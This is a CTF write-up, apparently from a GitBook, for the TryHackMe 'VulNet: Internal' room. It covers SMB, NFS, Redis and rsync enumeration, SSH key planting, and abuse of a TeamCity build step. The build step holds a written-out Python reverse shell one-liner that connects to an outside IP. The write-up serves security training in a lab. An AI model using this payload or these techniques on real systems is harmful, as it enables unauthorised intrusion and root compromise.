📓
Pentesting
  • Writeups
  • HackTheBox
    • Easy Machines
      • Beep Writeup
      • Shocker Writeup
      • Lame Writeup
      • Jerry Writeup
      • Legacy Writeup
      • Blue Writeup
  • TryHackMe
    • Walkthroughs: Easy
      • CC: Steganography
      • Cryptography for Dummies
      • Cross-site Scripting
      • SQL Injection Lab
      • SQL Injection
      • ZTH: Web 2
      • SSRF
      • XXE
      • Authenticate
      • Injection
      • Blaster
      • The Cod Caper
      • Hardening Basics Part 1
      • What the Shell?
      • Game Zone
      • Upload Vulnerabilities
      • Bolt
      • Erit Securus 1
      • CC: Pentesting
      • JavaScript Basics
      • OverPass 2 - Hacked
      • Linux: Local Enumeration
      • Ice
      • Linux Backdoors
      • Avengers Blog
      • DNS in Detail
      • Putting it all together
      • Kenobi
      • Common Linux Privesc
      • Network Services 2
      • Network Services
      • The Hacker Methodology
      • The Find command
      • HTTP in Detail
      • Web Fundamentals
      • How Websites Work
      • Introductory Networking
    • Challenges (CTF): Easy
      • VulNet: Roasted
      • VulNet: Internal
      • Git Happens
      • Kiba
      • VulNet: Node
      • Memory Forensics
      • Smag Grotto
      • Investigating Windows
      • Cat Pictures
      • Juicy Details
      • Anthem
      • Tony The Tiger
      • Jack-of-All-Trades
      • JPGChat
      • Blueprint
      • All in One
      • Gotta Catch'em All
      • Mustacchio
      • Break Out The Cage
      • HeartBleed
      • Poster
      • Madness
      • Source
      • Thompson
      • Library
      • Magician
      • Anonforce
      • Dav
      • GLITCH
      • Fowsniff CTF
      • Team
      • H4cked
      • Easy Peasy
      • ColddBox: Easy
      • Archangel
      • Cyborg
      • Chocolate Factory
      • Brute It
      • Year of the Rabbit
      • ChillHack
      • Gaming Server
      • Brooklyn Nine Nine
      • Wgel CTF
      • Tomghost
      • ToolsRus
      • Skynet
      • Startup
      • Agent Sudo
      • Lian-Yu
      • OhSINT
      • Overpass
      • Crack The Hash
      • Ignite
      • Inclusion
      • Bounty Hunter
      • LazyAdmin
      • RootMe
      • Pickle Rick
      • Basic Pentesting
      • Simple CTF
  • Crackmes.one
    • 1 Difficulty Rating
      • easyAF
      • Easy Keyg3nme
Powered by GitBook
On this page
  • Scanning
  • Enumeration
  • Exploitation
  • Privilege Escalation

Was this helpful?

  1. TryHackMe
  2. Challenges (CTF): Easy

VulNet: Internal

PreviousVulNet: RoastedNextGit Happens

Last updated 3 years ago

Was this helpful?

Scanning

Lets run nmap scan to find open ports and the services running on them.

Enumeration

Lets check port 9090 which is running SMB

Lets first look at what shares are on the system

The Shares disk is interesting , lets try to access it as an anonymous user

We were able to access it, lets cd into these directories and transfer all the files onto our machine

Lets read the services.txt file

Looks like we have the first flag.

Lets read the other files

There is nothing interesting, lets look at the other services running on the machine, lets first look at the RPC service running on port 111.

Looks like we have a directory, lets mount it onto our machine. First lets create a directory called mount and then use the command to mount the directory.

Lets look for interesting files in the directory. There is an interesting file in the redis directory.

There is a lot of information when we cat it, so lets look for pass strings so that we can get some information about the passwords and this is a configuration file

Now that we have the password, lets try to access redis and look for the second flag

We have the second flag. Now lets look at the auth Key, but we cannot GET the key so lets look at its file type

Now that we know its a list key type, lets read it.

We have a base64 strings, lets decode it

Looks like we have the credentials for the rsync service running on the system. Lets look at it in more detail and see what interesting files we can find.

Exploitation

Now we can get the files onto our machine or we can try to upload our ssh key and then login using ssh into the machine.

First we have to create our ssh key and then upload it to the machine.

Now we can login

Lets read the user flag

Privilege Escalation

Looking around there is an interesting directory

Lets look at this directory and read the readme file

Lets look at the ports running on the machine

Something is running on port 8111. Lets set up port forwarding so that we can see what is running on this port.

Now lets go to localhost:8111 in the browser.

We have a TeamCity login page. Clicking on the Super User option, we need an authentication token to login, lets look for this on the machine

grep -r "authentication token" 2>/dev/null

We have tokens, lets use one of them and login. (None of them work except the last one)

We are logged in.

Lets try to create a new project

Lets create a new Built Configuration

Now lets go to the homepage and click on the project name

Lets go to Edit Configuration Settings and then go to Built Steps and select python

Lets add a reverse shell to the Custom Script command option that we can choose

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.13.8.64",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

Lets now start a netcat listener on our machine

Lets save the file and run it by click run.

We have a shell as root, lets read the root flag.